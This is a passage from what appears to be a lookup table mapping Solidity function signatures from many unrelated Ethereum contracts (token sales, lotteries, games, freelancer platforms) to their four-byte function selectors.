"getBuyDemand(uint256)": "0xf737f274", "withdrawBuyDemand(uint256)": "0x718b0a32", "sellCrystal(uint256,uint256)": "0x08d317dd", "buyCrystalDemand(uint256,uint256,string,string)": "0x41fe0a24", "hasBooster(address)": "0xad5b7189", "getBoosterPrice(uint256)": "0x294cf912", "getBoosterData(uint256)": "0x39901be8", "buyBooster(uint256)": "0xd223926f", "getHashratePerDay(address)": "0x2243fb15", "buyMiner(uint256[])": "0x4ec2d0b6", "getFreeMiner(address)": "0x898644cc", "getSponsorFee()": "0x9f8ff91d", "m_ETHPriceLastUpdate()": "0x4a3cdf21", "centralBank()": "0x9a4a0fb2", "massEthFund()": "0xd1759141", "recoverETH()": "0x0614117a", "fomo3d()": "0xa41da348", "roundMax()": "0x82f43303", "totalCrowdsale()": "0xadb42139", "isIcoSuccess()": "0xe808aef7", "MINIMUMINVESTMENTPRESALE()": "0xe0d2771d", "capFiatAndETH()": "0x62c48e20", "totalEDUSLeft()": "0x9af8f5de", "metadataUrl()": "0xcd29c71a", "maxStage2AllocationPerInvestor()": "0x07293b9d", "ICOSuccess()": "0x47fa15e2", "withdrawalTo()": "0xc1d4691a", "mktValue()": "0x9d5f5cd3", "presaleTokensLimit()": "0x433900db", "minimumFundingUSD()": "0xa8f6d313", "numAccountsInfo()": "0xfa2f3e9a", "crowdsaleEndedBlock()": "0x20d19181", "b66AdvisorFundDepositAmt()": "0x2fd5ecda", "developer_EKN()": "0xd6728d51", "lastBlock_v5()": "0x9e8e23b7", "secondWallet()": "0x12cef27a", "claimerUnset()": "0xe088a96b", "getCrydrController()": "0xca9c2862", "BLS_PRE_ICO()": "0xc52f02ce", "jackpotAddress()": "0x6bc0b3ba", "currentRateM()": "0x798b18fd", "ICOStartDate()": "0x1778f1df", "isSaleEnded()": "0xf9059832", "jiGouTotalBalance()": "0x706f8856", "startICOStage5()": "0x1f43f396", "preSaleMinimumWei()": "0x6dd40168", "tokensIssuedTillNow()": "0x80218eeb", "DatToDtrcNumerator()": "0xbdf4bb73", "finishTransferGet()": "0x869af1ff", "NumbersToken()": "0xe37d883a", "timeOfLastOwnerWithdrawal()": "0x08681a74", "wholeSaleValueLeft()": "0xd735fa25", "betALenght()": "0xd0d68241", "account3()": "0x2384c058", "weeksFromCreation()": "0x17a7cd10", "GetMaximumBet_ether()": "0x95b7ea26", "advisor()": "0x1936e4be", "preIcoTokenSales()": "0x906ab111", "PRE_ICO_RISK_PERCENTAGE()": "0xa4d72886", "allEthShares()": "0x1919cf62", "goldDecimals()": "0x098300bb", "stage3Bonus()": "0xd5b36845", "transfersPaused()": "0x4563f30a", "allowedToBeSold()": "0x0449aa40", "MAXIMUM_NON_WHITELIST_AMOUNT()": "0x835cb53b", "developerFundDeposit()": "0x7a8b089b", "privateOfferingSupply()": "0xd29ebd2e", "hard_cap()": "0x585e1af6", "mainICOFirstWeekEndTime()": "0xdc661aaa", "lbToken()": "0x34f1f9b1", "ETHEUR()": "0xa3d646fe", "wasCrowdsaleStoped()": "0x36842110", "blockLockActive()": "0xd537c3e3", "STAGES_PERCENT_RATE()": "0x2ef75ebc", "privateFundEnabled()": "0xbf3eea48", "ADVISORS_PERCENTAGE()": "0x98036e7a", "m_callbackGas()": "0x0d334130", "BountyFund()": "0x42f0b07e", "stables()": "0x8f142907", "communityPeriodLength()": "0x6078b87e", "lastBlock_f15()": "0xec972a07", "StatsReserved()": "0x9d9ae444", "oldPrice()": "0x47593ae7", "gvAgent()": "0xed8e873c", "MINIMUM_DURATION()": "0x2d28e89d", "startTimeInMinutes()": "0x939935cb", "currentFundingRound()": "0x9ea776cd", "debug_last_approved()": "0x03ca7bcc", "MAX_OPS()": "0x786431c1", "VUP_TOKEN_SUPPLY_TIER3()": "0xc30354cb", "startQuater()": "0x8c042317", "ADDR_TKG_NODE()": "0x1fee37c8", "earlyWithdrawalFeePct()": "0xc947db81", "primaryOperator()": "0xd33656e0", "minContributionMainSale()": "0x5eec743b", "safeWithdrawAmount()": "0x06b05238", "checkTermination()": "0x3070c38b", "blksze()": "0x430ecff8", "teamFrozenTokens()": "0x75c9ee06", "START_ICO_TIMESTAMP()": "0x75b3a83e", "ico4Sold()": "0x4573a421", "MIN_ICO_GOAL()": "0x442e1079", "issuerDateMinutes()": "0x5ee2cec2", "airDropTokenIssuedTotal()": "0x57f94c82", "icoStartP4()": "0x6ea51811", "minimumWager()": "0xb19068c7", "ran()": "0x0472f549", "investorsSupply()": "0x01a0dee1", "best_submission_index()": "0x515ced53", "drpsToken()": "0x3905cab8", "dollarsForEther()": "0xc06a22f4", "DOW_FRI()": "0xd2b50743", "ServiceTask(string)": "0x54b3fa58", "withdraw(bytes,bytes,bytes32)": "0x202ac3bc", "close(bytes)": "0xb8bdd8dd", "setSomeValues()": "0xa7e328d4", "MapDemo()": "0x4a7b1acc", "guessNumber(uint16)": "0x778a5978", "sendNumber(uint16,address,address)": "0xd60f6cd9", "_next_id()": "0xe38d7e99", "take(bytes32,uint128)": "0x49606455", "kill(bytes32)": "0xb4f9b6c8", "bump(bytes32)": "0x779997c3", "determineAllocation(address,address[],uint256[])": "0x1a71733c", "isEmployee(address)": "0xea66543f", "EmployeeServ(address)": "0x2efad59d", "_blockKey(bytes32,bytes32,uint256)": "0x074fcfd5", "checkMAC(bytes32,bytes32[],bytes32)": "0x73d4d9f9", "EthTransferContract(address)": "0x55cb61ca", "claim(bytes32,bytes32,bytes32)": "0xb0ed656c", "Locked(uint256)": "0x032bc66b", "hasSeat(uint256)": "0xb3b32dc0", "EventTicket(uint256,uint256)": "0x79c12db5", "ChainBackedOption()": "0xe39a686c", "timeFundingStart(uint256)": "0x05626f09", "setMinimum(uint256)": "0x3209e9e6", "freezeSupply(uint256)": "0x0bb25901", "isFundingOpen()": "0xd3d864f5", "RGXToken(string,string,uint256,uint256,uint8)": "0xea1f4082", "Lockup6m(address)": "0x19a64104", "JustmakeToken()": "0xa7b7eefb", "rocketshipReachedDestination()": "0xe4ff0f18", "maxETHAutoContributions()": "0xdfdd3997", "maxETHContribution()": "0x841410cd", "JM_ETH_ExchangeRate()": "0x384ddc32", "foundationSupplyRemaining()": "0x9d8cb45c", "ecosystemSupplyRemaining()": "0x0ceaeb5a", "feesAndBountySupplyRemaining()": "0xdb8f5a35", "tokenSaleSupplyRemaining()": "0x47bc1f94", "currentStageETHContributions()": "0x57e53d4e", "currentStageRemainingJM()": "0xa579349a", "currentStageMaxSupply()": "0xa3a5650a", "currentStage()": "0x5bf5d54c", "autoDistributionViaETHContributions()": "0xad7a5ff9", "isFlying()": "0x7f695f28", "engineRunning()": "0xebed561b", "setMaxETHAutoContributions(uint256)": "0xb398e098", "setMaxETHContribution(uint256)": "0xa12e9670", "setJMETHExchangeRate(uint256)": "0x966a3b29", "setAutoDistributionViaETHContributions(bool,bool)": "0xa85ffd1a", "releaseEcosystemJM(address)": "0x5b2e39e0", "releaseFoundationJM(address)": "0xb4421e7c", "releaseFeesAndBountyJM(address,uint256)": "0x4f1ae61a", "autoReleaseTokenSaleJM()": "0x17c4f0a0", "releaseTokenSaleJM(address,uint256)": "0x3aa9376c", "blastOff(address)": "0x3e6f118a", "startEngines()": "0x18cc4c65", "ManagedToken()": "0xc8ed6253", "endContract(address)": "0xc383e020", "funForOwner()": "0xb3cdabfd", "setFreelancerJobIndex(address,uint256,address,uint256)": "0x08f2e24c", "notContractPred(address,address[],uint256)": "0x098c83fe", "getRate(address,uint256)": "0x886ef644", "getContracts(address,address[],uint256)": "0x53667f10", "getContract(address,address,uint256)": "0xe3bd9638", "getInvitationCreatedOn(address,uint256)": "0x041e3929", "getProposalCreatedOn(address,uint256)": "0xe99b9ab7", "getEmployerFeedbackOn(address,uint256)": "0x679577a5", "getFreelancerFeedbackOn(address,uint256)": "0x971b2b2e", "setStatus(address,uint256,uint8)": "0x0a90011f", "getJob(address,uint256)": "0x772199a1", "getEmployer(address,uint256)": "0x5d49705b", "getTotalPaid(address,uint256)": "0xc81f49cb", "addTotalPaid(address,uint256,uint256)": "0x8e314783", "getTotalInvoicesCount(address,uint256[])": "0x7e687a8b", "getInvoices(address,uint256[])": "0xe13062c2", "getInvoicesByStatus(address,uint256,uint8)": "0xabb69a1a", "getInvoicesCount(address,uint256)": "0x3cb9032e", "getInvoices(address,uint256)": "0x518b4372", "addInvoice(address,uint256,uint256,uint256)": "0x975e463a", "subTotalInvoiced(address,uint256,uint256)": "0xff74c0b8", "addTotalInvoiced(address,uint256,uint256)": "0x15c560c7", "getOtherContractParticipant(address,uint256,address)": "0x649564b3", "getMessages(address,uint256)": "0xb598d3e8", "addMessage(address,uint256,uint256)": "0x32a45ac5", "addEmployerFeedback(address,uint256,address,string,uint8)": "0xdc8c06d8", "addFreelancerFeedback(address,uint256,address,string,uint8)": "0x215bf604", "addUserFeedback(address,uint256,address,string,string,string,string,string,string,uint8)": "0x50dc4bfe", "addFeedback(address,uint256,address,string,uint8)": "0xfd50299a", "cancelContract(address,address,uint256,string)": "0x52c22a72", "addContract(address,address,uint256,string,bool)": "0x5f865912", "addProposal(address,uint256,address,string,uint256)": "0x8503b6a5", "addInvitation(address,address,uint256,address,string)": "0xf704cb98", "TicTacToeAdjudicator(address,address,address,address,uint256)": "0xce8ff29b", "bet(uint256,uint256,uint256,uint256,uint256,uint256)": "0x53c3419b", "LiquetLottery()": "0xb3a26071", "getResponseAddress()": "0x7e9ba301", "setResponseAddress(address)": "0x9d7e6ca8", "getQueryAddress()": "0x321db4d4", "setQueryAddress(address)": "0xe30fe37a", "TinyOracleLookup()": "0x23f614dd", "ComputationService()": "0x678ee795", "DTXTestToken()": "0xab75e6c8", "AllTest7()": "0xfe6bca8f", "unlock(address,address[],uint256[])": "0x5710ac73", "haltCrowdsale()": "0x5d51b550", "confirmCrowdsaleEnd()": "0x8b322791", "declareCrowdsaleEnd()": "0xbd957585", "sellLimit(uint256,uint256)": "0xcab9c32a", "buyLimit(uint256)": "0x9b7edbdb", "getSellPrice(uint256)": "0xba730e53", "getBuyPrice(uint256)": "0x08d4db14", "AdsharesToken(address,address,address,uint256)": "0x736c24b5", "getWrefundIndex(uint8)": "0xfbbc3448", "getWtotalTransCnt(uint8)": "0xfafe029f", "getWactive(uint8)": "0x1ebcdba4", "getWtoken(uint8)": "0x50b6ba0b", "getWtotalEth(uint8)": "0x160fe0e2", "getPplsAddr(uint32)": "0xdbeabd21", "getPpls(uint32)": "0x5c3004da", "ZAYAToken()": "0x12c96f5f", "backSkinCoinOwner()": "0x84efe4d6", "SkinCoin()": "0x85ff5e13", "returnTokensForDay(uint256,uint256)": "0xd6475c3a", "getInfo(address,uint256,uint256)": "0x3c275e24", "returnTokensInPool(address[],uint256[])": "0xaec77b63", "getProfitForDay(uint256,uint256)": "0xfbe8dab9", "getTokensPerDay(uint256)": "0xa885dab6", "calculateProfit(uint256)": "0x5b21ba6f", "buyInternal(address)": "0xb2ac1bbe", "buyWithPromo(address)": "0xa2de5b50", "takeEther(address,uint256)": "0x6300c768", "partnerWithdraw()": "0x971362c9", "getPartnerBalance(address)": "0x016fa018", "buyFor(address)": "0x6f0b5180", "getToday()": "0xa4f3fa10", "updateEtherPrice(uint256,uint256)": "0x10a6fdc2", "increaseMaxAvailableTokens(uint256,string,uint256)": "0xec12f1ef", "Grass()": "0xcd761b9c", "changeState(bool)": "0x1deb0a8f", "setICORatio(uint256)": "0x92fee51a", "setAIRDROPBounce(uint256)": "0xe45285cf", "Configurator()": "0xcaeb30e9", "unlockBatchOfAddresses(address[])": "0x2ed1f26e", "removeUnlockedAddress(address,address)": "0x52c1c03a", "addUnlockedAddress(address,address)": "0x3cda6524", "ProofOfLongHodl()": "0xaaf20486", "UacToken()": "0x1aa022bf", "getPremiums()": "0x14d296f4", "getFounderMember(uint256)": "0x219a6f04", "getFounderMembersInvest(address)": "0x9e1533a9", "getAttoTokensToBeFounder()": "0xd3b234fc", "getPremiumsAvailable()": "0x99c69d40", "getCurrentPricePerWei()": "0xdb087ad5", "getIcoStatus()": "0xdbc57971", "setCurrentPricePerWei(uint256)": "0x239fd68f", "transferFromBRXPay(address,address,uint256)": "0xc625bd27", "setNewBRXPay(address)": "0x8ecbc4e9", "BRXToken()": "0x2853a0d7", "_selectWinner(uint256)": "0xbb925c19", "_finalizeRound()": "0x8c88b85f", "_oraclizeQueueWinner(bool)": "0x50560a1a", "_oraclizeQueueRound()": "0xad717e8c", "enterCurrentRound()": "0xfef5ae43", "manualFinalizeRound()": "0x1c35e7ba", "restartRound(bool,bool)": "0x6f0a150f", "stopRound(bool)": "0xd53abe1b", "startRound(bool)": "0xe66dde38", "changeFeePercentage(uint8)": "0xa410f4b1", "changeMaximumPlayers(uint32)": "0xc043c0d9", "changeMinimumBet(uint256)": "0x616fbee7", "_canPayOraclize(uint256)": "0xc8088830", "_calcRemainingRoundTime()": "0xc64fbbce", "_startNextRound()": "0xc697cbec", "_abortAllRounds()": "0xe6ca00b5", "_abortCurrentRound()": "0x95608083", "getPastWinnerTimestamps()": "0x2463de5a", "getPastWinnerPrizes()": "0x4a790540", "getPastWinnerEntries()": "0xb778e69e", "getPastWinnerAddresses()": "0x4fb7f1d7", "getCurrentRoundTotal()": "0x90835848", "getCurrentRoundEntry()": "0xd4b795c0", "isCurrentRoundFinishing()": "0x0c2ec050", "getRoundFunds()": "0x9161f789", "setOraclizeWinnerTimeOffset(uint8)": "0xf5ff3dc7", "getOraclizeWinnerTimeOffset()": "0xd264a878", "setOraclizeWinnerGasFee(uint256)": "0x5e9e2226", "getOraclizeWinnerGasFee()": "0x242d9f69", "setOraclizeRoundGasFee(uint256)": "0x46ff64f3", "getOraclizeRoundGasFee()": "0xbd3a5208", "getOraclizeGasPrice()": "0xa9db9ce6", "getNextFeePercentage()": "0x913967d0", "getFeePercentage()": "0x11efbf61", "getNextMaximumPlayers()": "0x0db1b335", "getMaximumPlayers()": "0x39eb3491", "getNextMinimumBet()": "0x3e76018b", "setRoundLength(uint32)": "0xad62bda5", "getRoundLength()": "0xce6236ca", "isOraclizeQueued()": "0xb07a3107", "Raffle(uint64,uint32,uint256)": "0x084fa898", "AtomicX()": "0xc6b85d2b", "Staker()": "0xe75a0747", "ICO_HARDCAP()": "0x8ff1a583", "upgradeGems()": "0x0f0308fb", "tokenAdd()": "0xe29f99f0", "allowDisbursePaymentWhenPaused()": "0x859bcc71", "gasOraclize()": "0xeb799177", "onThrone()": "0xf64c08b1", "EurocoinB()": "0x1ecb3889", "maxPos()": "0x01239adf", "last_payment_timestamp()": "0xc9079673", "ownerRate()": "0x688cdba8", "chickenHunt()": "0x21029f47", "capAdjusted()": "0x9555c9d9", "minWei()": "0xaddd7020", "numOfBackers()": "0x359829db", "durationSeconds()": "0x9acba2af", "PlayNow()": "0xab48f2f8", "haltedFX()": "0x9972b76c", "HackableETH()": "0x6221dc20", "emissionContractAddress()": "0x27b57aee", "getDoublePeriod()": "0x6993b507", "cTime()": "0xebd7cda4", "parentContract()": "0x230b9da3", "kindCount()": "0x080bfdeb", "griefCost()": "0xfb490695", "totalLockAmount()": "0xa111bab9", "RANDOM_BYTES_COUNT()": "0xf36c0810", "issueContractAddress()": "0xae18f5ad", "totalMined()": "0x5556db65", "getSpecialAddresses()": "0xa7ecd0ad", "storageControllerAddress()": "0x77c07c19", "withdrawedFundrasingPart()": "0xa24ea666", "tokensDistributedToContributors()": "0x9274c16b", "WITHDRAWAL_END_TIME()": "0xbddd1e7e", "setPromoPause()": "0xfae8c29e", "SALT()": "0xba9a91a5", "support_proposal()": "0xb46a8a21", "lastBlock_a15Hash_uint256()": "0x5bbe66a7", "rateTierNormal()": "0x9319f44d", "RATE_CROWDSALE_S3()": "0x2ccc9057", "maxWithoutWhitelistPerUser()": "0xbfead4b9", "bookingFee()": "0x6c788a0d", "dtEnd()": "0xafcc1286", "consumed()": "0x67636574", "ethRate2()": "0xc20155df", "SFT_PER_ETH_SECOND_EARLY_BIRD_RATE()": "0x74eead66", "EPXtokenSupply()": "0x18f2217a", "santaClaus()": "0xf9f2c93c", "endsAt()": "0x0a09284a", "developmentTeamTokensMinted()": "0x44831edf", "preICOcap()": "0x71f9ff89", "oldToken()": "0xb31c710a", "POINTS_TO_LEVEL()": "0xf94f6910", "founderMulSigAddress()": "0x0229e448", "itDevAddr()": "0x8bd379b5", "bountyAddress()": "0xc516358f", "tokensPerCents()": "0xd53a9b85", "liveBlocksNumber()": "0x5ac849d2", "ausGroupAllocation()": "0xc758b813", "IcoStatus()": "0x1c2ac5ac", "buyComission()": "0xc9cc0498", "m_beneficiary()": "0xf6a5b13e", "walletVersion()": "0xbc517131", "noOfSeats()": "0xce803a70", "TOKENS_TOTAL_SUPPLY()": "0x60662fe2", "earlyBirdPrice()": "0x54e30c37", "sellTransferFee()": "0xecef615b", "timelockVault()": "0xaefea053", "gmtFund()": "0xd9c397f6", "lastBlock_f9()": "0x957a2772", "avatarFee()": "0xf945ba2d", "colorPrice()": "0xf635052f", "boardCost()": "0x2be4f3f5", "foundersRewardTime()": "0x7d61de37", "claimAmountSet()": "0x23ecc4a1", "contributionAccepted()": "0xc6deeb9d", "northadvisor()": "0xb4d8166e", "moonLevel()": "0xce3800e1", "transferAgent()": "0x760cd8e1", "campaignState()": "0xf4c9b1fd", "percentageQuarter1()": "0xc5a0d1c7", "TEAM_FUND()": "0xb4b598ce", "NUM_RESERVED_AXIE()": "0x0d605c4a", "minerTotalSupply()": "0xabc48a0d", "costPerTicket()": "0x46f9bedf", "TEAMmint()": "0x9f7a2ef5", "atxControllerAddr()": "0x496be2cf", "openNonceId()": "0xf975a024", "startTimeStage3()": "0x26ad3abc", "marketIncentivesAllocation()": "0x457750a4", "highBonus()": "0x1db5f974", "commandPercent()": "0xadba54e0", "RATE()": "0x664e9704", "reserveCap()": "0x2223a5da", "createFirstDay()": "0xcfae52e1", "lastBlock_a0()": "0xbd6812a4", "feesPer10000()": "0xb2ba0aa5", "tokenIssuedPrivateIco()": "0x78f74fbe", "OTHER_STAKE()": "0x37828c52", "allocateRestOfTokens()": "0xee43d30f", "isUserWithdrawalTime()": "0x463d5ce1", "_bonusToFighters(uint32,uint8,uint256)": "0x505da5c7", "_bonusToPartners(uint256)": "0x9f5f0826", "_addMoney(address,uint256)": "0x705d528d", "_getFightData(uint32)": "0x33fba1ed", "doLogFighter(uint32,uint256,uint256)": "0x5d67830a", "clearTheSeason(uint32)": "0x398712b5", "processSeason(uint32)": "0xe0ce0b79", "getFighters(uint32)": "0xe3049b6f", "betOn(uint32,uint32,uint256,address)": "0xa99a985b", "BetOnMatch(address)": "0x934076f1", "bonusOne(uint256)": "0x4f5c6e0a", "bonusAll()": "0x760b8f62", "_getRandom(uint32)": "0x4d0d80a2", "_localFight(uint32,uint32)": "0x31e41fba", "createSeason(uint32,uint64,uint64,address[8],uint256[8],uint16[8],address[8])": "0xf29fdb8a", "checkCooSeed(uint32)": "0xeb880380", "getSeasonInfo(uint32[99])": "0xbd812166", "isNormalUser(address)": "0x2a21a3af", "OwnerBase()": "0x6d8b529a", "SDCToken()": "0x00a4b146", "TokenERC20(uint256)": "0xe6d7fd33", "BitsumCash()": "0x6ad7aeb5", "PoHarj()": "0xc21aa2e4", "BurnMe()": "0xcbaddbaa", "setWallet(address,address)": "0xf1b234ad", "AndhraToken()": "0xbce32da4", "TotalSpecialFeeTakes()": "0x14143c91", "removeSpecialFeeTake(uint256)": "0x4a180cb3", "chnageSpecialFeeTake(uint256,address,uint256,uint256)": "0xfba9dbbb", "addSpecialFeeTake(address,uint256,uint256)": "0xcf478921", "Coinchangex(address,address,uint256)": "0x00b9eb8b", "USDBCoin()": "0x7fcac0fb", "ownerSetMod(bool)": "0x8c5d5e87", "ownerSetEtherwowAddress(address)": "0xa59d930b", "FixBet76()": "0x38e078b4", "getGamePrize(uint256)": "0xead2bfdc", "getGameWin(uint256)": "0x29a86dde", "getGameNumber(uint256)": "0x9439060f", "getGameHash(uint256)": "0xd1988b6a", "getGameEnd(uint256)": "0x188b81b4", "getGameStart(uint256)": "0xc235a5c7", "getGameAmount(uint256)": "0xc20547b3", "getGamePlayer(uint256)": "0x1d6b867c", "getGameIds()": "0x9f668bba", "setPointer(uint8)": "0x4e72ec91", "setMaxBetAmount(uint256)": "0x7cfbc7a5", "setMinBetAmount(uint256)": "0x6c188593", "placeBet(uint8,uint8)": "0xa648567b", "getNumber(bytes32)": "0x2ecb0d64", "notify(address,uint256,uint8,uint8,uint8,uint256,uint256,bool)": "0x7d0381a7", "Cajutel(uint256,string,string,address,address,address,uint256,uint256)": "0xfa107a41", "buy(address,address,uint256,uint256)": "0xa9d424e2", "getIcoTokensAmount(uint256,uint256)": "0x0655c58b", "LoggedPhaseICO(uint256,uint256,uint256,string,string,uint8,bool,bool)": "0xdfa6bc72", "refundUnclaimedEthers(uint256)": "0x07a95e83", "addDividend(uint256)": "0x752d2bfb", "LoggedDividend(uint256,string,uint8,string,bool,bool)": "0xb07c76e8", "LoggedERC20(uint256,string,uint8,string,bool,bool)": "0x220a0e36", "X2()": "0x0e10f1ae", "changeRegistrationStatuses(address[],bool)": "0x7b9358a0", "changeRegistrationStatus(address,bool)": "0xf24d2532", "reallocation(uint256)": "0x16180e8e", "reallocate(uint256)": "0x0fe433db", "distributeTokens(address,address,address,address,address,address)": "0x0a9de288", "PATH(uint256)": "0x9f45f982", "updateAward(uint256)": "0x5eb332da", "judgeReleaseRecordExist(uint256)": "0x08474d2a", "releaseSupply(uint256)": "0x9fc3587a", "releaseToday()": "0xb778d4b4", "unlockTransfer()": "0xbf6d9abd", "setEthCollector(address)": "0x7ce85957", "ECHO()": "0x881dac8e", "countDownToEndCrowdsale()": "0x3a027b26", "isSaleRunning()": "0x8510b43f", "Add(uint256,uint256)": "0x7afbe4f1", "Sub(uint256,uint256)": "0x1ec9c2c0", "Div(uint256,uint256)": "0x9a03fe1d", "Mul(uint256,uint256)": "0x60953744", "issueTokensForAssets(uint256)": "0x39cef0b7", "decreaseTotalSupply(uint256)": "0x6e114511", "increaseTotalSupply(uint256)": "0x1d43cc98", "decreaseAssetsCertified(uint256)": "0x50116afb", "increaseAssetsCertified(uint256)": "0x1d532a97", "releaseAssets(uint256)": "0x3936e99a", "receiveAssets(uint256)": "0x4e98a5b3", "setAssetsCertified(uint256)": "0xa784d969", "setAssetsOnDeposit(uint256)": "0x5b5e7bbe", "assetsCertified()": "0x5445cbf3", "assetsOnDeposit()": "0x52353e5b", "unpauseRedemption()": "0x8d044c06", "pauseRedemption()": "0x92bccb80", "redemptionPaused()": "0x73a95ddd", "depository()": "0xbedd12a5", "setDepository(address)": "0x37472c4b", "auditor()": "0x3ec045a6", "issuer()": "0x1d143848", "roleCheck(string,address,address)": "0x52879ba6", "roleHas(string,address,address)": "0x0b1e5acc", "kcck256straddadd(string,address,address)": "0xe623a1a6", "kcck256stradd(string,address)": "0xcd880b1e", "Board()": "0x509cd360", "valid_creature(address)": "0x7d9383c3", "changeElectorate(address)": "0x406c52d5", "ElectedBoardController(address,address[],uint256,address)": "0xcc3d574b", "getGreeting()": "0xfe50cc72", "getStorage()": "0x3408f73a", "updateStorage(uint256,uint256)": "0xe5689afa", "c(uint256,uint256)": "0x9c34a15f", "getQueryCost(string)": "0x340a247c", "getQueryResults(bytes32)": "0x191be7b7", "testOracleQuery(string,string)": "0x416851a0", "OraclizeQueryTest()": "0x32eb2314", "STQPreSale(address,address)": "0x9d5de12e", "getPointsBalance()": "0x8eb89a61", "getPlayerPoints(bytes32)": "0xccecc71f", "awardPoint(int256,bytes32)": "0x5337fa10", "addPlayer(bytes32,bytes32,bytes6)": "0xf51f5e78", "MPGame(uint8)": "0xff6c8b87", "a(bytes32)": "0x9f3fab58", "RemoveOwners(address[])": "0xa51d5f02", "AddOwners(address[])": "0x985f26f6", "cleanArray(uint256[])": "0x8434c80d", "updatePokecoinAndPokemarketAddresses(address,address)": "0x10c9c76d", "delPokemonFromSellingList(address,uint256)": "0x4163d75d", "addPokemonToSellingList(address,uint256)": "0xd05ba4da", "buyPokemon(address,uint256)": "0xc0ec55a5", "stopSale(address,uint256)": "0xb7086f7b", "newSale(address,uint256,uint256)": "0x5b4cc249", "transferPokemon(address,address,uint256)": "0xc80f9a4f", "f(uint256)": "0xb3de648b", "withMod(uint256)": "0xf9fef3b3", "claimInheritance()": "0x9f3c4416", "setHeir(address,uint8,uint256)": "0x0d82cb3a", "sendFunds(address,uint256,bytes)": "0x2e7e33df", "setCheckInPeriod(uint256)": "0xaf136dea", "checkIn()": "0x183ff085", "HeritableWallet(address,address,uint256)": "0x8c3088c6", "getMoney()": "0x98e1b410", "pizza_machine(uint256,uint256,uint256)": "0xbf7e4026", "addclip(address,string,string,string)": "0xfe3c6ad4", "like(address,uint256)": "0xe4626c8f", "blockTube(uint256,string,uint8,string)": "0x87c55589", "giveRightToVote(address,address)": "0xc05e5776", "send1(address)": "0x753f416a", "call1(uint256)": "0xe9a51c0d", "info()": "0x370158ea", "verify(bytes32,string,string)": "0x0ec1b057", "verifyUrl(string,string)": "0x8934d115", "score(bytes32,string)": "0x7f187d2d", "setLookup(address)": "0x49bedf42", "Facebook()": "0xb7692032", "setGxCoinContract(address)": "0xc7f7be5c", "cry()": "0x092854e5", "stare(uint256,uint256)": "0x28802f19", "removeWhiteListed(uint256)": "0xbde7fa7d", "addWhiteListed(address)": "0xfb62e083", "setMockedDate(uint256)": "0xe3692473", "ReserveTokensHolderMock(address,address,address)": "0x6e051dba", "getResult(uint256,uint256)": "0x949f80c5", "FinalizeDispute(address)": "0xabc2ab75", "fundsOf()": "0x407456d1", "revealVote(string,uint256,uint256)": "0xbca72b59", "returnSecretVoteHash(uint256)": "0xaea96513", "storeSecretVote(bytes32,uint256)": "0x0469d644", "generateVoteSecret(string,uint256)": "0x0e741a36", "GetDisputesAtTheMoment()": "0x9890d6bc", "HowLongIsDisputeRevealStillRunning(uint256)": "0xa5af66c5", "HowLongIsDisputeStillRunning(uint256)": "0xf60957c0", "createDispute(address)": "0xaf75ad2d", "getBlocklancerToken()": "0x1f7b5318", "getBlocklancerContractHolder()": "0xbe4dbe26", "getTokenHolderTribunal()": "0xcdcc5d3e", "getLastTransferred(address)": "0x6e6ca6f5", "checkPermission(uint8,address)": "0x3ebd6092", "setPermissionByAddress(uint8,address,bool)": "0x983c7630", "setPermissionByAddress(uint8,address)": "0xc3d08f06", "setPermissionById(uint8,bytes32,bool)": "0xd6a43a3e", "fixPermission(address,address,uint8,bool)": "0x9f8abede", "setPermissionById(uint8,bytes32)": "0xc28b4577", "FlightDelayAccessController(address)": "0x297cb974", "sendFunds(address,uint256)": "0x6f64234e", "setEthlanceSponsorContract(address)": "0x8918485b", "setEthlanceInvoiceContract(address)": "0xe2e7ab3a", "EthlanceSponsorWallet()": "0x6991cb13", "deploy(address,uint256,uint8,address,uint256[])": "0xa07da887", "ContractManager()": "0xd8a52178", "mintForReportingParticipant(int256,address,uint256)": "0xd05461a6", "feeWindowBurn(address,uint256)": "0xf7862ec2", "ImportRemappingTestA()": "0x40f313b9", "SetCustomerInfo(uint64,bytes18,bytes32,bytes11)": "0x3a4cba05", "GetOtherCustomerInfo(bytes18)": "0x0676aade", "getEnum()": "0xf0ebce5a", "setEnum()": "0x4b8399f4", "setArray(bytes1[],bytes8[],bytes32[],int256[],uint256[],bool[])": "0x5926b55a", "setByte(bytes1,bytes8,bytes32)": "0xddfc50df", "getConstant()": "0xf13a38a6", "getNotConstant()": "0x6316f6d1", "setNotConstant()": "0xdf88f5b8", "getInt()": "0x62738998", "setInt(int256,int8,int16,int32,int256)": "0xfce1cc35", "distributedSaleStakes()": "0x65fbc99f", "CANCELATION_DATE()": "0x9090ce1f", "isSecured()": "0x81a28c28", "boost()": "0xa66f42c0", "WithdrawEnabled()": "0xbe3eac25", "availableForWithdrawal()": "0x35ba9af8", "getIssuedBy()": "0x3f8b0a1d", "authorisedMinter()": "0x7fc29fc9", "tokenPricePerUSD()": "0x4620adbb", "rangeETHAmount()": "0xd1b1b65a", "KPOPIO_CONTRACT_ADDRESS()": "0x4bdd6a8e", "investmentLimit()": "0xba7efcdd", "maxMintable()": "0x2154dc39", "ADMIN_CONTRACT()": "0x1e7c27cb", "stakingContract()": "0xee99205c", "LockSAToE()": "0x6f923a7c", "phase_2_remaining_tokens()": "0xb6693f80", "etherSince100()": "0x699a3a7f", "fixedPrice()": "0x1efba6c2", "MINOR_VERSION()": "0xc8b91531", "totalDividendPoints()": "0x2113342d", "SMILO_FOUNDATION_AMOUNT()": "0xeb780d3c", "updateCost()": "0xc7af3dd1", "endpoint()": "0x5e280f11", "adviserSupply()": "0x6fd44086", "bountiesAllocation()": "0x520c7c8c", "founderReward()": "0xecc1caef", "nextroundtotalsupplyGOTCH()": "0x1a2a627c", "blablabla()": "0x06a95b53", "runTime()": "0xee23e7f7", "capTime()": "0x4df28ae4", "phase9Price()": "0x864824a0", "confirmed()": "0xa968991b", "totalSupplyUnits()": "0x63e33e96", "userAttackMonsterCDSeconds()": "0xcfd5cb77", "launcher()": "0x16eebd1e", "firstStageWallet()": "0xaf7a0899", "traded_token_balance()": "0x79557e4f", "burningEnabled()": "0x4d754715", "ownersStakeAdded()": "0x2956262b", "currentMintNonce()": "0x79b2614d", "t8exToken()": "0x5da6ec5b", "nextBonusStepLimit()": "0xbc745a0d", "tokenPoolAddress()": "0x298d075f", "ZTHTKN()": "0x219df7ee", "getEntriesCount()": "0xd09685b0", "maxLength()": "0xd06a89a4", "AgriChainSeal()": "0xa7b83225", "contractLaunched()": "0xaec205a5", "m_softCap()": "0x8945d643", "TOKEN_AMOUNT_ICO_STAGE1_PRE_SALE1()": "0x4fdb91ab", "getRemainingBlocksUntilPayoutk()": "0xb8bf0f1f", 